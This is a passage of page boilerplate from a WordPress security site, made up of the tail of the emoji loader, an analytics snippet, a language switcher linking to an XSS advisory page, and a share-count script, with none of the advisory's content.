OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))});
//# sourceURL=https://wp-security.org/wp-includes/js/wp-emoji-loader.min.js
</script>
<!-- Usermaven - privacy-friendly analytics tool -->
<script type="text/javascript">
(function () {
window.usermaven = window.usermaven || (function () { (window.usermavenQ = window.usermavenQ || []).push(arguments); })
var t = document.createElement('script'),
s = document.getElementsByTagName('script')[0];
t.defer = true;
t.id = 'um-tracker';
t.setAttribute('data-tracking-host', 'https://u.wp-security.org');
t.setAttribute('data-key', 'UMZaYew9Sp');
t.setAttribute('data-autocapture', 'true'); t.setAttribute('data-randomize-url', 'true');
t.src = 'https://u.wp-security.org/lib.js';
s.parentNode.insertBefore(t, s);
})();
</script>
<!-- / Usermaven -->
<nav
class="trp-language-switcher trp-floating-switcher trp-ls-dropdown trp-switcher-position-bottom"
style="--bg:#ffffffb2;--bg-hover:#0000000d;--text:#000000;--text-hover:#000000;--border:1px solid transparent;--border-radius:8px 8px 0px 0px;--flag-radius:2px;--flag-size:20px;--aspect-ratio:4/3;--font-size:16px;--switcher-width:auto;--switcher-padding:10px 0;--transition-duration:0.2s;--bottom:0px;--right:10vw"
role="navigation"
aria-label="網站語言選擇器"
data-no-translation
>
<div class="trp-language-switcher-inner">
<div class="trp-language-item trp-language-item__current" title="Chinese (Hong Kong)" role="button" tabindex="0" aria-expanded="false" aria-label="Change language" aria-controls="trp-switcher-dropdown-list" data-no-translation><span class="trp-language-item-name">Chinese (Hong Kong)</span></div>
<div
class="trp-switcher-dropdown-list"
id="trp-switcher-dropdown-list"
role="group"
aria-label="可用語言"
hidden
inert
>
<a href="https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="English" data-no-translation><span class="trp-language-item-name">English</span></a> <a href="https://wp-security.org/zh_cn/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Chinese (China)" data-no-translation><span class="trp-language-item-name">Chinese (China)</span></a> <a href="https://wp-security.org/es/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Spanish" data-no-translation><span class="trp-language-item-name">Spanish</span></a> <a href="https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Hindi" data-no-translation><span class="trp-language-item-name">Hindi</span></a> <a href="https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="French" data-no-translation><span class="trp-language-item-name">French</span></a> </div>
</div>
</nav>
<script type="text/javascript">
"use strict";
(function($) {
$( window ).on( 'load', function() {
// Each All Share boxes.
$( '.pk-share-buttons-mode-rest' ).each( function() {
var powerkitButtonsIds = [],
powerkitButtonsBox = $( this );
// Check Counts.
if ( ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-counts' ) && ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) ) {
return;
}
powerkitButtonsBox.find( '.pk-share-buttons-item' ).each( function() {
if ( $( this ).attr( 'data-id' ).length > 0 ) {
powerkitButtonsIds.push( $( this ).attr( 'data-id' ) );
}
});
// Generate accounts data.
var powerkitButtonsData = {};
if( powerkitButtonsIds.length > 0 ) {
powerkitButtonsData = {
'ids' : powerkitButtonsIds.join(),
'post_id' : powerkitButtonsBox.attr( 'data-post-id' ),
'url' : powerkitButtonsBox.attr( 'data-share-url' ),
};
}
// Get results by REST API.
$.ajax({
type: 'GET',
url: 'https://wp-security.org/zh/wp-json/social-share/v1/get-shares',
data: powerkitButtonsData,
beforeSend: function(){
// Add Loading Class.
powerkitButtonsBox.addClass( 'pk-share-buttons-loading' );
},
success: function( response ) {
if ( ! $.isEmptyObject( response ) && ! response.hasOwnProperty( 'code' ) ) {
// Accounts loop.
$.each( response, function( index, data ) {
if ( index !== 'total_count' ) {
// Find Bsa Item.
var powerkitButtonsItem = powerkitButtonsBox.find( '.pk-share-buttons-item[data-id="' + index + '"]');
// Set Count.
if ( data.hasOwnProperty( 'count' ) && data.count ) {
powerkitButtonsItem.removeClass( 'pk-share-buttons-no-count' ).addClass( 'pk-share-buttons-item-count' );
powerkitButtonsItem.find( '.pk-share-buttons-count' ).html( data.count );
} else {
powerkitButtonsItem.addClass( 'pk-share-buttons-no-count' );
}
}
});
if ( powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) && response.hasOwnProperty( 'total_count' ) ) {
var powerkitButtonsTotalBox = powerkitButtonsBox.find( '.pk-share-buttons-total' );
if ( response.total_count ) {
powerkitButtonsTotalBox.find( '.pk-share-buttons-count' ).html( response.total_count );
powerkitButtonsTotalBox.show().removeClass( 'pk-share-buttons-total-no-count' );
}
}
}
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
},
error: function() {
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
}
});
});
});
})(jQuery);
</script>
</body>
</html>
<!--
Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com
使用 PhpRedis (v6.3.0) 從 Redis 中檢索到 10094 物件 (1 MB)。.
-->